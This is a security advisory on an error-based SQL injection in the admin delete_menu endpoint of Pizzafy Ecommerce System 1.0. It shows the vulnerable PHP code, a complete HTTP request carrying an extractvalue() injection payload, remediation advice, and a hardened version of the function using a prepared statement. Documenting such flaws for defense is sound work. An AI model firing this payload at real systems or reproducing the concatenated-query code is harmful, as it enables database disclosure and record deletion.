# Vulnerability Summary: Error-Based SQL Injection in Pizzafy Ecommerce System 1.0

## Vulnerability Overview

* **Affected Version**: Pizzafy Ecommerce System 1.0
* **Vulnerability Type**: SQL Injection (Error-Based SQL Injection)
* **Severity**: HIGH
* **Vulnerable Endpoint**: `/pizzafy/admin/ajax.php?action=delete_menu`
* **Description**: The `id` parameter of the `delete_menu` action is concatenated directly into a `DELETE` statement without validation or parameterization, allowing an attacker to inject arbitrary SQL into backend database queries.

## Impact Scope

* **Confidentiality**: Complete disclosure of database schema and user credentials.
* **Integrity**: Unauthorized deletion or modification of records.
* **Availability**: Denial of service caused by large-scale deletion.
* **Privilege Escalation**: Session hijacking and administrative access via extraction of session data.

## Proof of Concept (PoC)

### 1. Vulnerable Code

```php
function delete_menu(){
    extract($_POST);
    $delete = $this->conn->query("DELETE FROM product_list where id = ".$id);
    if($delete) {
        return 1;
    } else {
        return $this->conn->error;
    }
}
```

### 2. Exploit Payload

```http
POST /pizzafy/admin/ajax.php?action=delete_menu HTTP/1.1
Host: localhost
Content-Length: 5
sec-ch-ua: ""
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/pizzafy/admin/index.php?page=menu
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=frvskm23h4ngc6r6kmu620js83
Connection: close

id=-2 OR extractvalue(1,concat(0x7e,database())) --
```

## Remediation

1. **Use Prepared Statements**: Adopt parameterized queries so that user input is bound as data and never becomes part of the SQL text.
2. **Input Validation**: Validate and sanitize the `id` parameter, allowing only expected values (here, a positive integer).
3. **Database Permissions**: Restrict the privileges of the application's database user to limit the potential damage of SQL injection.
4. **Monitoring and Logging**: Track and alert on anomalous patterns, such as unusual query volumes or repeated access attempts against the same endpoint.
5. **Security Testing**: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities.
6. **Error Handling**: Avoid exposing database-related errors in responses, as the `extractvalue()` payload above relies on the error text being returned to the client.
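The following is an added example of a hardened `delete_menu()` that applies remediation items 1, 2 and 6 together. It is not the Pizzafy project's own code; it assumes that `$this->conn` is a `mysqli` connection (consistent with the `->query()` and `->error` calls in the vulnerable method) and that the method lives in a class that owns that connection.

```php
<?php
// Added example, not part of the Pizzafy Ecommerce System source.
// Assumes a mysqli connection is injected into the class (hypothetical class name).
class MenuActions
{
    private mysqli $conn;

    public function __construct(mysqli $conn)
    {
        $this->conn = $conn;
    }

    // Returns 1 when a row was deleted, 0 otherwise. Never returns driver error text.
    public function delete_menu(): int
    {
        // Item 2: do not extract() untrusted POST data into local variables.
        // Read the one parameter we expect and require a positive integer;
        // a value such as "-2 OR extractvalue(...)" fails validation here.
        $id = filter_var($_POST['id'] ?? '', FILTER_VALIDATE_INT, [
            'options' => ['min_range' => 1],
        ]);
        if ($id === false) {
            return 0;
        }

        // Item 1: parameterized query. The id is bound as an integer and is
        // never concatenated into the SQL string.
        $stmt = $this->conn->prepare("DELETE FROM product_list WHERE id = ?");
        if ($stmt === false) {
            // Item 6: keep driver errors in the server log, not in the response.
            error_log("delete_menu: prepare failed: " . $this->conn->error);
            return 0;
        }

        $stmt->bind_param("i", $id);
        if (!$stmt->execute()) {
            error_log("delete_menu: execute failed: " . $stmt->error);
            $stmt->close();
            return 0;
        }

        $affected = $stmt->affected_rows;
        $stmt->close();
        return $affected > 0 ? 1 : 0;
    }
}

// Usage (assumes connection details supplied by the application's config):
// $actions = new MenuActions(new mysqli('localhost', 'dbuser', 'dbpass', 'pizzafy'));
// echo $actions->delete_menu();
```

Note that the integer validation alone would already defeat the payload shown in the PoC, but the prepared statement is the control that holds even if the validation is later relaxed, and the generic return value removes the error-based oracle that `extractvalue()` depends on.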